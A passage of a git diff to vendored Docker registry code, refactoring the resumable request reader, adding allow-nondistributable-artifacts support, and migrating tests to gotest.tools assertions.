 			checkEqual(t, repoInfo.Index.Name, expectedRepoInfo.Index.Name, reposName)
-			checkEqual(t, repoInfo.RemoteName(), expectedRepoInfo.RemoteName, reposName)
-			checkEqual(t, repoInfo.Name(), expectedRepoInfo.LocalName, reposName)
-			checkEqual(t, repoInfo.FullName(), expectedRepoInfo.CanonicalName, reposName)
+			checkEqual(t, reference.Path(repoInfo.Name), expectedRepoInfo.RemoteName, reposName)
+			checkEqual(t, reference.FamiliarName(repoInfo.Name), expectedRepoInfo.LocalName, reposName)
+			checkEqual(t, repoInfo.Name.Name(), expectedRepoInfo.CanonicalName, reposName)
 			checkEqual(t, repoInfo.Index.Official, expectedRepoInfo.Index.Official, reposName)
 			checkEqual(t, repoInfo.Official, expectedRepoInfo.Official, reposName)
 		}
@@ -539,8 +542,8 @@ func TestNewIndexInfo(t *testing.T) {
 		}
 	}
 
-	config := newServiceConfig(ServiceOptions{})
-	noMirrors := []string{}
+	config := emptyServiceConfig
+	var noMirrors []string
 	expectedIndexInfos := map[string]*registrytypes.IndexInfo{
 		IndexName: {
 			Name:     IndexName,
@@ -570,7 +573,11 @@ func TestNewIndexInfo(t *testing.T) {
 	testIndexInfo(config, expectedIndexInfos)
 
 	publicMirrors := []string{"http://mirror1.local", "http://mirror2.local"}
-	config = makeServiceConfig(publicMirrors, []string{"example.com"})
+	var err error
+	config, err = makeServiceConfig(publicMirrors, []string{"example.com"})
+	if err != nil {
+		t.Fatal(err)
+	}
 
 	expectedIndexInfos = map[string]*registrytypes.IndexInfo{
 		IndexName: {
@@ -618,7 +625,10 @@ func TestNewIndexInfo(t *testing.T) {
 	}
 	testIndexInfo(config, expectedIndexInfos)
 
-	config = makeServiceConfig(nil, []string{"42.42.0.0/16"})
+	config, err = makeServiceConfig(nil, []string{"42.42.0.0/16"})
+	if err != nil {
+		t.Fatal(err)
+	}
 	expectedIndexInfos = map[string]*registrytypes.IndexInfo{
 		"example.com": {
 			Name:     "example.com",
@@ -655,6 +665,7 @@ func TestNewIndexInfo(t *testing.T) {
 }
 
 func TestMirrorEndpointLookup(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	containsMirror := func(endpoints []APIEndpoint) bool {
 		for _, pe := range endpoints {
 			if pe.URL.Host == "my.mirror" {
@@ -663,13 +674,17 @@ func TestMirrorEndpointLookup(t *testing.T) {
 		}
 		return false
 	}
-	s := DefaultService{config: makeServiceConfig([]string{"my.mirror"}, nil)}
+	cfg, err := makeServiceConfig([]string{"https://my.mirror"}, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	s := DefaultService{config: cfg}
 
 	imageName, err := reference.WithName(IndexName + "/test/image")
 	if err != nil {
 		t.Error(err)
 	}
-	pushAPIEndpoints, err := s.LookupPushEndpoints(imageName.Hostname())
+	pushAPIEndpoints, err := s.LookupPushEndpoints(reference.Domain(imageName))
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -677,7 +692,7 @@ func TestMirrorEndpointLookup(t *testing.T) {
 		t.Fatal("Push endpoint should not contain mirror")
 	}
 
-	pullAPIEndpoints, err := s.LookupPullEndpoints(imageName.Hostname())
+	pullAPIEndpoints, err := s.LookupPullEndpoints(reference.Domain(imageName))
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -688,7 +703,7 @@ func TestMirrorEndpointLookup(t *testing.T) {
 
 func TestPushRegistryTag(t *testing.T) {
 	r := spawnTestRegistrySession(t)
-	repoRef, err := reference.ParseNamed(REPO)
+	repoRef, err := reference.ParseNormalizedNamed(REPO)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -710,7 +725,7 @@ func TestPushImageJSONIndex(t *testing.T) {
 			Checksum: "sha256:bea7bf2e4bacd479344b737328db47b18880d09096e6674165533aa994f5e9f2",
 		},
 	}
-	repoRef, err := reference.ParseNamed(REPO)
+	repoRef, err := reference.ParseNormalizedNamed(REPO)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -747,16 +762,12 @@ func TestSearchRepositories(t *testing.T) {
 func TestTrustedLocation(t *testing.T) {
 	for _, url := range []string{"http://example.com", "https://example.com:7777", "http://docker.io", "http://test.docker.com", "https://fakedocker.com"} {
 		req, _ := http.NewRequest("GET", url, nil)
-		if trustedLocation(req) == true {
-			t.Fatalf("'%s' shouldn't be detected as a trusted location", url)
-		}
+		assert.Check(t, !trustedLocation(req))
 	}
 
 	for _, url := range []string{"https://docker.io", "https://test.docker.com:80"} {
 		req, _ := http.NewRequest("GET", url, nil)
-		if trustedLocation(req) == false {
-			t.Fatalf("'%s' should be detected as a trusted location", url)
-		}
+		assert.Check(t, trustedLocation(req))
 	}
 }
 
@@ -811,6 +822,51 @@ func TestAddRequiredHeadersToRedirectedRequests(t *testing.T) {
 	}
 }
 
+func TestAllowNondistributableArtifacts(t *testing.T) {
+	tests := []struct {
+		addr       string
+		registries []string
+		expected   bool
+	}{
+		{IndexName, nil, false},
+		{"example.com", []string{}, false},
+		{"example.com", []string{"example.com"}, true},
+		{"localhost", []string{"localhost:5000"}, false},
+		{"localhost:5000", []string{"localhost:5000"}, true},
+		{"localhost", []string{"example.com"}, false},
+		{"127.0.0.1:5000", []string{"127.0.0.1:5000"}, true},
+		{"localhost", nil, false},
+		{"localhost:5000", nil, false},
+		{"127.0.0.1", nil, false},
+		{"localhost", []string{"example.com"}, false},
+		{"127.0.0.1", []string{"example.com"}, false},
+		{"example.com", nil, false},
+		{"example.com", []string{"example.com"}, true},
+		{"127.0.0.1", []string{"example.com"}, false},
+		{"127.0.0.1:5000", []string{"example.com"}, false},
+		{"example.com:5000", []string{"42.42.0.0/16"}, true},
+		{"example.com", []string{"42.42.0.0/16"}, true},
+		{"example.com:5000", []string{"42.42.42.42/8"}, true},
+		{"127.0.0.1:5000", []string{"127.0.0.0/8"}, true},
+		{"42.42.42.42:5000", []string{"42.1.1.1/8"}, true},
+		{"invalid.domain.com", []string{"42.42.0.0/16"}, false},
+		{"invalid.domain.com", []string{"invalid.domain.com"}, true},
+		{"invalid.domain.com:5000", []string{"invalid.domain.com"}, false},
+		{"invalid.domain.com:5000", []string{"invalid.domain.com:5000"}, true},
+	}
+	for _, tt := range tests {
+		config, err := newServiceConfig(ServiceOptions{
+			AllowNondistributableArtifacts: tt.registries,
+		})
+		if err != nil {
+			t.Error(err)
+		}
+		if v := allowNondistributableArtifacts(config, tt.addr); v != tt.expected {
+			t.Errorf("allowNondistributableArtifacts failed for %q %v, expected %v got %v", tt.addr, tt.registries, tt.expected, v)
+		}
+	}
+}
+
 func TestIsSecureIndex(t *testing.T) {
 	tests := []struct {
 		addr               string
@@ -844,7 +900,10 @@ func TestIsSecureIndex(t *testing.T) {
 		{"invalid.domain.com:5000", []string{"invalid.domain.com:5000"}, false},
 	}
 	for _, tt := range tests {
-		config := makeServiceConfig(nil, tt.insecureRegistries)
+		config, err := makeServiceConfig(nil, tt.insecureRegistries)
+		if err != nil {
+			t.Error(err)
+		}
 		if sec := isSecureIndex(config, tt.addr); sec != tt.expected {
 			t.Errorf("isSecureIndex failed for %q %v, expected %v got %v", tt.addr, tt.insecureRegistries, tt.expected, sec)
 		}
diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader.go
similarity index 62%
rename from vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go
rename to vendor/github.com/docker/docker/registry/resumable/resumablerequestreader.go
index bebc8608cd..8e97a1a4d1 100644
--- a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go
+++ b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader.go
@@ -1,4 +1,4 @@
-package httputils
+package resumable // import "github.com/docker/docker/registry/resumable"
 
 import (
 	"fmt"
@@ -6,10 +6,10 @@ import (
 	"net/http"
 	"time"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 )
 
-type resumableRequestReader struct {
+type requestReader struct {
 	client          *http.Client
 	request         *http.Request
 	lastRange       int64
@@ -17,30 +17,31 @@ type resumableRequestReader struct {
 	currentResponse *http.Response
 	failures        uint32
 	maxFailures     uint32
+	waitDuration    time.Duration
 }
 
-// ResumableRequestReader makes it possible to resume reading a request's body transparently
+// NewRequestReader makes it possible to resume reading a request's body transparently
 // maxfail is the number of times we retry to make requests again (not resumes)
 // totalsize is the total length of the body; auto detect if not provided
-func ResumableRequestReader(c *http.Client, r *http.Request, maxfail uint32, totalsize int64) io.ReadCloser {
-	return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize}
+func NewRequestReader(c *http.Client, r *http.Request, maxfail uint32, totalsize int64) io.ReadCloser {
+	return &requestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, waitDuration: 5 * time.Second}
 }
 
-// ResumableRequestReaderWithInitialResponse makes it possible to resume
+// NewRequestReaderWithInitialResponse makes it possible to resume
 // reading the body of an already initiated request.
-func ResumableRequestReaderWithInitialResponse(c *http.Client, r *http.Request, maxfail uint32, totalsize int64, initialResponse *http.Response) io.ReadCloser {
-	return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, currentResponse: initialResponse}
+func NewRequestReaderWithInitialResponse(c *http.Client, r *http.Request, maxfail uint32, totalsize int64, initialResponse *http.Response) io.ReadCloser {
+	return &requestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, currentResponse: initialResponse, waitDuration: 5 * time.Second}
 }
 
-func (r *resumableRequestReader) Read(p []byte) (n int, err error) {
+func (r *requestReader) Read(p []byte) (n int, err error) {
 	if r.client == nil || r.request == nil {
-		return 0, fmt.Errorf("client and request can't be nil\n")
+		return 0, fmt.Errorf("client and request can't be nil")
 	}
 	isFreshRequest := false
 	if r.lastRange != 0 && r.currentResponse == nil {
 		readRange := fmt.Sprintf("bytes=%d-%d", r.lastRange, r.totalSize)
 		r.request.Header.Set("Range", readRange)
-		time.Sleep(5 * time.Second)
+		time.Sleep(r.waitDuration)
 	}
 	if r.currentResponse == nil {
 		r.currentResponse, err = r.client.Do(r.request)
@@ -49,7 +50,7 @@ func (r *resumableRequestReader) Read(p []byte) (n int, err error) {
 	if err != nil && r.failures+1 != r.maxFailures {
 		r.cleanUpResponse()
 		r.failures++
-		time.Sleep(5 * time.Duration(r.failures) * time.Second)
+		time.Sleep(time.Duration(r.failures) * r.waitDuration)
 		return 0, nil
 	} else if err != nil {
 		r.cleanUpResponse()
@@ -80,14 +81,14 @@ func (r *resumableRequestReader) Read(p []byte) (n int, err error) {
 	return n, err
 }
 
-func (r *resumableRequestReader) Close() error {
+func (r *requestReader) Close() error {
 	r.cleanUpResponse()
 	r.client = nil
 	r.request = nil
 	return nil
 }
 
-func (r *resumableRequestReader) cleanUpResponse() {
+func (r *requestReader) cleanUpResponse() {
 	if r.currentResponse != nil {
 		r.currentResponse.Body.Close()
 		r.currentResponse = nil
diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader_test.go
similarity index 68%
rename from vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go
rename to vendor/github.com/docker/docker/registry/resumable/resumablerequestreader_test.go
index 5a2906db77..c72c210e77 100644
--- a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go
+++ b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader_test.go
@@ -1,4 +1,4 @@
-package httputils
+package resumable // import "github.com/docker/docker/registry/resumable"
 
 import (
 	"fmt"
@@ -8,6 +8,10 @@ import (
 	"net/http/httptest"
 	"strings"
 	"testing"
+	"time"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestResumableRequestHeaderSimpleErrors(t *testing.T) {
@@ -20,28 +24,19 @@ func TestResumableRequestHeaderSimpleErrors(t *testing.T) {
 
 	var req *http.Request
 	req, err := http.NewRequest("GET", ts.URL, nil)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	expectedError := "client and request can't be nil\n"
-	resreq := &resumableRequestReader{}
+	resreq := &requestReader{}
 	_, err = resreq.Read([]byte{})
-	if err == nil || err.Error() != expectedError {
-		t.Fatalf("Expected an error with '%s', got %v.", expectedError, err)
-	}
+	assert.Check(t, is.Error(err, "client and request can't be nil"))
 
-	resreq = &resumableRequestReader{
+	resreq = &requestReader{
 		client:    client,
 		request:   req,
 		totalSize: -1,
 	}
-	expectedError = "failed to auto detect content length"
 	_, err = resreq.Read([]byte{})
-	if err == nil || err.Error() != expectedError {
-		t.Fatalf("Expected an error with '%s', got %v.", expectedError, err)
-	}
-
+	assert.Check(t, is.Error(err, "failed to auto detect content length"))
 }
 
 // Not too much failures, bails out after some wait
@@ -50,20 +45,18 @@ func TestResumableRequestHeaderNotTooMuchFailures(t *testing.T) {
 
 	var badReq *http.Request
 	badReq, err := http.NewRequest("GET", "I'm not an url", nil)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	resreq := &resumableRequestReader{
-		client:      client,
-		request:     badReq,
-		failures:    0,
-		maxFailures: 2,
+	resreq := &requestReader{
+		client:       client,
+		request:      badReq,
+		failures:     0,
+		maxFailures:  2,
+		waitDuration: 10 * time.Millisecond,
 	}
 	read, err := resreq.Read([]byte{})
-	if err != nil || read != 0 {
-		t.Fatalf("Expected no error and no byte read, got err:%v, read:%v.", err, read)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(0, read))
 }
 
 // Too much failures, returns the error
@@ -72,11 +65,9 @@ func TestResumableRequestHeaderTooMuchFailures(t *testing.T) {
 
 	var badReq *http.Request
 	badReq, err := http.NewRequest("GET", "I'm not an url", nil)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	resreq := &resumableRequestReader{
+	resreq := &requestReader{
 		client:      client,
 		request:     badReq,
 		failures:    0,
@@ -86,9 +77,8 @@ func TestResumableRequestHeaderTooMuchFailures(t *testing.T) {
 
 	expectedError := `Get I%27m%20not%20an%20url: unsupported protocol scheme ""`
 	read, err := resreq.Read([]byte{})
-	if err == nil || err.Error() != expectedError || read != 0 {
-		t.Fatalf("Expected the error '%s', got err:%v, read:%v.", expectedError, err, read)
-	}
+	assert.Check(t, is.Error(err, expectedError))
+	assert.Check(t, is.Equal(0, read))
 }
 
 type errorReaderCloser struct{}
@@ -103,9 +93,7 @@ func (errorReaderCloser) Read(p []byte) (n int, err error) {
 func TestResumableRequestReaderWithReadError(t *testing.T) {
 	var req *http.Request
 	req, err := http.NewRequest("GET", "", nil)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	client := &http.Client{}
 
@@ -117,7 +105,7 @@ func TestResumableRequestReaderWithReadError(t *testing.T) {
 		Body:          errorReaderCloser{},
 	}
 
-	resreq := &resumableRequestReader{
+	resreq := &requestReader{
 		client:          client,
 		request:         req,
 		currentResponse: response,
@@ -128,21 +116,15 @@ func TestResumableRequestReaderWithReadError(t *testing.T) {
 
 	buf := make([]byte, 1)
 	read, err := resreq.Read(buf)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	if read != 0 {
-		t.Fatalf("Expected to have read nothing, but read %v", read)
-	}
+	assert.Check(t, is.Equal(0, read))
 }
 
 func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) {
 	var req *http.Request
 	req, err := http.NewRequest("GET", "", nil)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	client := &http.Client{}
 
@@ -154,7 +136,7 @@ func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) {
 		Body:          ioutil.NopCloser(strings.NewReader("")),
 	}
 
-	resreq := &resumableRequestReader{
+	resreq := &requestReader{
 		client:          client,
 		request:         req,
 		currentResponse: response,
@@ -165,9 +147,7 @@ func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) {
 
 	buf := make([]byte, 1)
 	_, err = resreq.Read(buf)
-	if err == nil || err != io.EOF {
-		t.Fatalf("Expected an io.EOF error, got %v", err)
-	}
+	assert.Check(t, is.Error(err, io.EOF.Error()))
 }
 
 func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) {
@@ -180,13 +160,11 @@ func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) {
 
 	var req *http.Request
 	req, err := http.NewRequest("GET", ts.URL, nil)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	client := &http.Client{}
 
-	resreq := &resumableRequestReader{
+	resreq := &requestReader{
 		client:    client,
 		request:   req,
 		lastRange: 1,
@@ -195,13 +173,10 @@ func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) {
 
 	buf := make([]byte, 2)
 	_, err = resreq.Read(buf)
-	if err == nil || err.Error() != "the server doesn't support byte ranges" {
-		t.Fatalf("Expected an error 'the server doesn't support byte ranges', got %v", err)
-	}
+	assert.Check(t, is.Error(err, "the server doesn't support byte ranges"))
 }
 
 func TestResumableRequestReaderWithZeroTotalSize(t *testing.T) {
-
 	srvtxt := "some response text data"
 
 	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
@@ -211,30 +186,22 @@ func TestResumableRequestReaderWithZeroTotalSize(t *testing.T) {
 
 	var req *http.Request
 	req, err := http.NewRequest("GET", ts.URL, nil)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	client := &http.Client{}
 	retries := uint32(5)
 
-	resreq := ResumableRequestReader(client, req, retries, 0)
+	resreq := NewRequestReader(client, req, retries, 0)
 	defer resreq.Close()
 
 	data, err := ioutil.ReadAll(resreq)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	resstr := strings.TrimSuffix(string(data), "\n")
-
-	if resstr != srvtxt {
-		t.Errorf("resstr != srvtxt")
-	}
+	assert.Check(t, is.Equal(srvtxt, resstr))
 }
 
 func TestResumableRequestReader(t *testing.T) {
-
 	srvtxt := "some response text data"
 
 	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
@@ -244,31 +211,23 @@ func TestResumableRequestReader(t *testing.T) {
 
 	var req *http.Request
 	req, err := http.NewRequest("GET", ts.URL, nil)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	client := &http.Client{}
 	retries := uint32(5)
 	imgSize := int64(len(srvtxt))
 
-	resreq := ResumableRequestReader(client, req, retries, imgSize)
+	resreq := NewRequestReader(client, req, retries, imgSize)
 	defer resreq.Close()
 
 	data, err := ioutil.ReadAll(resreq)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	resstr := strings.TrimSuffix(string(data), "\n")
-
-	if resstr != srvtxt {
-		t.Errorf("resstr != srvtxt")
-	}
+	assert.Check(t, is.Equal(srvtxt, resstr))
 }
 
 func TestResumableRequestReaderWithInitialResponse(t *testing.T) {
-
 	srvtxt := "some response text data"
 
 	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
@@ -278,30 +237,21 @@ func TestResumableRequestReaderWithInitialResponse(t *testing.T) {
 
 	var req *http.Request
 	req, err := http.NewRequest("GET", ts.URL, nil)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	client := &http.Client{}
 	retries := uint32(5)
 	imgSize := int64(len(srvtxt))
 
 	res, err := client.Do(req)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	resreq := ResumableRequestReaderWithInitialResponse(client, req, retries, imgSize, res)
+	resreq := NewRequestReaderWithInitialResponse(client, req, retries, imgSize, res)
 	defer resreq.Close()
 
 	data, err := ioutil.ReadAll(resreq)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	resstr := strings.TrimSuffix(string(data), "\n")
-
-	if resstr != srvtxt {
-		t.Errorf("resstr != srvtxt")
-	}
+	assert.Check(t, is.Equal(srvtxt, resstr))
 }
diff --git a/vendor/github.com/docker/docker/registry/service.go b/vendor/github.com/docker/docker/registry/service.go
index 596a9c7e5f..b441970ff1 100644
--- a/vendor/github.com/docker/docker/registry/service.go
+++ b/vendor/github.com/docker/docker/registry/service.go
@@ -1,20 +1,20 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
+	"context"
 	"crypto/tls"
-	"fmt"
 	"net/http"
 	"net/url"
 	"strings"
 	"sync"
 
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/distribution/registry/client/auth"
 	"github.com/docker/docker/api/types"
 	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/reference"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 const (
@@ -31,6 +31,8 @@ type Service interface {
 	Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error)
 	ServiceConfig() *registrytypes.ServiceConfig
 	TLSConfig(hostname string) (*tls.Config, error)
+	LoadAllowNondistributableArtifacts([]string) error
+	LoadMirrors([]string) error
 	LoadInsecureRegistries([]string) error
 }
 
@@ -43,10 +45,10 @@ type DefaultService struct {
 
 // NewService returns a new instance of DefaultService ready to be
 // installed into an engine.
-func NewService(options ServiceOptions) *DefaultService {
-	return &DefaultService{
-		config: newServiceConfig(options),
-	}
+func NewService(options ServiceOptions) (*DefaultService, error) {
+	config, err := newServiceConfig(options)
+
+	return &DefaultService{config: config}, err
 }
 
 // ServiceConfig returns the public registry service configuration.
@@ -55,13 +57,17 @@ func (s *DefaultService) ServiceConfig() *registrytypes.ServiceConfig {
 	defer s.mu.Unlock()
 
 	servConfig := registrytypes.ServiceConfig{
-		InsecureRegistryCIDRs: make([]*(registrytypes.NetIPNet), 0),
-		IndexConfigs:          make(map[string]*(registrytypes.IndexInfo)),
-		Mirrors:               make([]string, 0),
+		AllowNondistributableArtifactsCIDRs:     make([]*(registrytypes.NetIPNet), 0),
+		AllowNondistributableArtifactsHostnames: make([]string, 0),
+		InsecureRegistryCIDRs:                   make([]*(registrytypes.NetIPNet), 0),
+		IndexConfigs:                            make(map[string]*(registrytypes.IndexInfo)),
+		Mirrors:                                 make([]string, 0),
 	}
 
 	// construct a new ServiceConfig which will not retrieve s.Config directly,
 	// and look up items in s.config with mu locked
+	servConfig.AllowNondistributableArtifactsCIDRs = append(servConfig.AllowNondistributableArtifactsCIDRs, s.config.ServiceConfig.AllowNondistributableArtifactsCIDRs...)
+	servConfig.AllowNondistributableArtifactsHostnames = append(servConfig.AllowNondistributableArtifactsHostnames, s.config.ServiceConfig.AllowNondistributableArtifactsHostnames...)
 	servConfig.InsecureRegistryCIDRs = append(servConfig.InsecureRegistryCIDRs, s.config.ServiceConfig.InsecureRegistryCIDRs...)
 
 	for key, value := range s.config.ServiceConfig.IndexConfigs {
@@ -73,6 +79,22 @@ func (s *DefaultService) ServiceConfig() *registrytypes.ServiceConfig {
 	return &servConfig
 }
 
+// LoadAllowNondistributableArtifacts loads allow-nondistributable-artifacts registries for Service.
+func (s *DefaultService) LoadAllowNondistributableArtifacts(registries []string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	return s.config.LoadAllowNondistributableArtifacts(registries)
+}
+
+// LoadMirrors loads registry mirrors for Service
+func (s *DefaultService) LoadMirrors(mirrors []string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	return s.config.LoadMirrors(mirrors)
+}
+
 // LoadInsecureRegistries loads insecure registries for Service
 func (s *DefaultService) LoadInsecureRegistries(registries []string) error {
 	s.mu.Lock()
@@ -95,12 +117,12 @@ func (s *DefaultService) Auth(ctx context.Context, authConfig *types.AuthConfig,
 	}
 	u, err := url.Parse(serverAddress)
 	if err != nil {
-		return "", "", fmt.Errorf("unable to parse server address: %v", err)
+		return "", "", errdefs.InvalidParameter(errors.Errorf("unable to parse server address: %v", err))
 	}
 
 	endpoints, err := s.LookupPushEndpoints(u.Host)
 	if err != nil {
-		return "", "", err
+		return "", "", errdefs.InvalidParameter(err)
 	}
 
 	for _, endpoint := range endpoints {
@@ -118,6 +140,7 @@ func (s *DefaultService) Auth(ctx context.Context, authConfig *types.AuthConfig,
 			logrus.Infof("Error logging in to %s endpoint, trying next endpoint: %v", endpoint.Version, err)
 			continue
 		}
+
 		return "", "", err
 	}
 
@@ -176,7 +199,7 @@ func (s *DefaultService) Search(ctx context.Context, term string, limit int, aut
 			},
 		}
 
-		modifiers := DockerHeaders(userAgent, nil)
+		modifiers := Headers(userAgent, nil)
 		v2Client, foundV2, err := v2AuthHTTPClient(endpoint.URL, endpoint.client.Transport, modifiers, creds, scopes)
 		if err != nil {
 			if fErr, ok := err.(fallbackError); ok {
@@ -226,16 +249,17 @@ func (s *DefaultService) ResolveRepository(name reference.Named) (*RepositoryInf
 
 // APIEndpoint represents a remote API endpoint
 type APIEndpoint struct {
-	Mirror       bool
-	URL          *url.URL
-	Version      APIVersion
-	Official     bool
-	TrimHostname bool
-	TLSConfig    *tls.Config
+	Mirror                         bool
+	URL                            *url.URL
+	Version                        APIVersion
+	AllowNondistributableArtifacts bool
+	Official                       bool
+	TrimHostname                   bool
+	TLSConfig                      *tls.Config
 }
 
 // ToV1Endpoint returns a V1 API endpoint based on the APIEndpoint
-func (e APIEndpoint) ToV1Endpoint(userAgent string, metaHeaders http.Header) (*V1Endpoint, error) {
+func (e APIEndpoint) ToV1Endpoint(userAgent string, metaHeaders http.Header) *V1Endpoint {
 	return newV1Endpoint(*e.URL, e.TLSConfig, userAgent, metaHeaders)
 }
 
diff --git a/vendor/github.com/docker/docker/registry/service_v1.go b/vendor/github.com/docker/docker/registry/service_v1.go
index 1d251aec6e..d955ec51fb 100644
--- a/vendor/github.com/docker/docker/registry/service_v1.go
+++ b/vendor/github.com/docker/docker/registry/service_v1.go
@@ -1,4 +1,4 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import "net/url"
 
diff --git a/vendor/github.com/docker/docker/registry/service_v1_test.go b/vendor/github.com/docker/docker/registry/service_v1_test.go
index bd15dfffb8..11861f7c05 100644
--- a/vendor/github.com/docker/docker/registry/service_v1_test.go
+++ b/vendor/github.com/docker/docker/registry/service_v1_test.go
@@ -1,9 +1,18 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
-import "testing"
+import (
+	"os"
+	"testing"
+
+	"gotest.tools/skip"
+)
 
 func TestLookupV1Endpoints(t *testing.T) {
-	s := NewService(ServiceOptions{})
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
+	s, err := NewService(ServiceOptions{})
+	if err != nil {
+		t.Fatal(err)
+	}
 
 	cases := []struct {
 		hostname    string
diff --git a/vendor/github.com/docker/docker/registry/service_v2.go b/vendor/github.com/docker/docker/registry/service_v2.go
index 228d745f8c..3a56dc9114 100644
--- a/vendor/github.com/docker/docker/registry/service_v2.go
+++ b/vendor/github.com/docker/docker/registry/service_v2.go
@@ -1,4 +1,4 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
 	"net/url"
@@ -44,6 +44,8 @@ func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndp
 		return endpoints, nil
 	}
 
+	ana := allowNondistributableArtifacts(s.config, hostname)
+
 	tlsConfig, err = s.tlsConfig(hostname)
 	if err != nil {
 		return nil, err
@@ -55,9 +57,10 @@ func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndp
 				Scheme: "https",
 				Host:   hostname,
 			},
-			Version:      APIVersion2,
-			TrimHostname: true,
-			TLSConfig:    tlsConfig,
+			Version: APIVersion2,
+			AllowNondistributableArtifacts: ana,
+			TrimHostname:                   true,
+			TLSConfig:                      tlsConfig,
 		},
 	}
 
@@ -67,8 +70,9 @@ func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndp
 				Scheme: "http",
 				Host:   hostname,
 			},
-			Version:      APIVersion2,
-			TrimHostname: true,
+			Version: APIVersion2,
+			AllowNondistributableArtifacts: ana,
+			TrimHostname:                   true,
 			// used to check if supposed to be secure via InsecureSkipVerify
 			TLSConfig: tlsConfig,
 		})
diff --git a/vendor/github.com/docker/docker/registry/session.go b/vendor/github.com/docker/docker/registry/session.go
index 72e286ab44..ef14299594 100644
--- a/vendor/github.com/docker/docker/registry/session.go
+++ b/vendor/github.com/docker/docker/registry/session.go
@@ -1,10 +1,8 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
 	"bytes"
 	"crypto/sha256"
-	"errors"
-	"sync"
 	// this is required for some certificates
 	_ "crypto/sha512"
 	"encoding/hex"
@@ -17,22 +15,26 @@ import (
 	"net/url"
 	"strconv"
 	"strings"
+	"sync"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/distribution/registry/api/errcode"
 	"github.com/docker/docker/api/types"
 	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/pkg/httputils"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/jsonmessage"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/docker/pkg/tarsum"
-	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry/resumable"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 var (
 	// ErrRepoNotFound is returned if the repository didn't exist on the
 	// remote side
-	ErrRepoNotFound = errors.New("Repository not found")
+	ErrRepoNotFound notFoundError = "Repository not found"
 )
 
 // A Session is used to communicate with a V1 registry
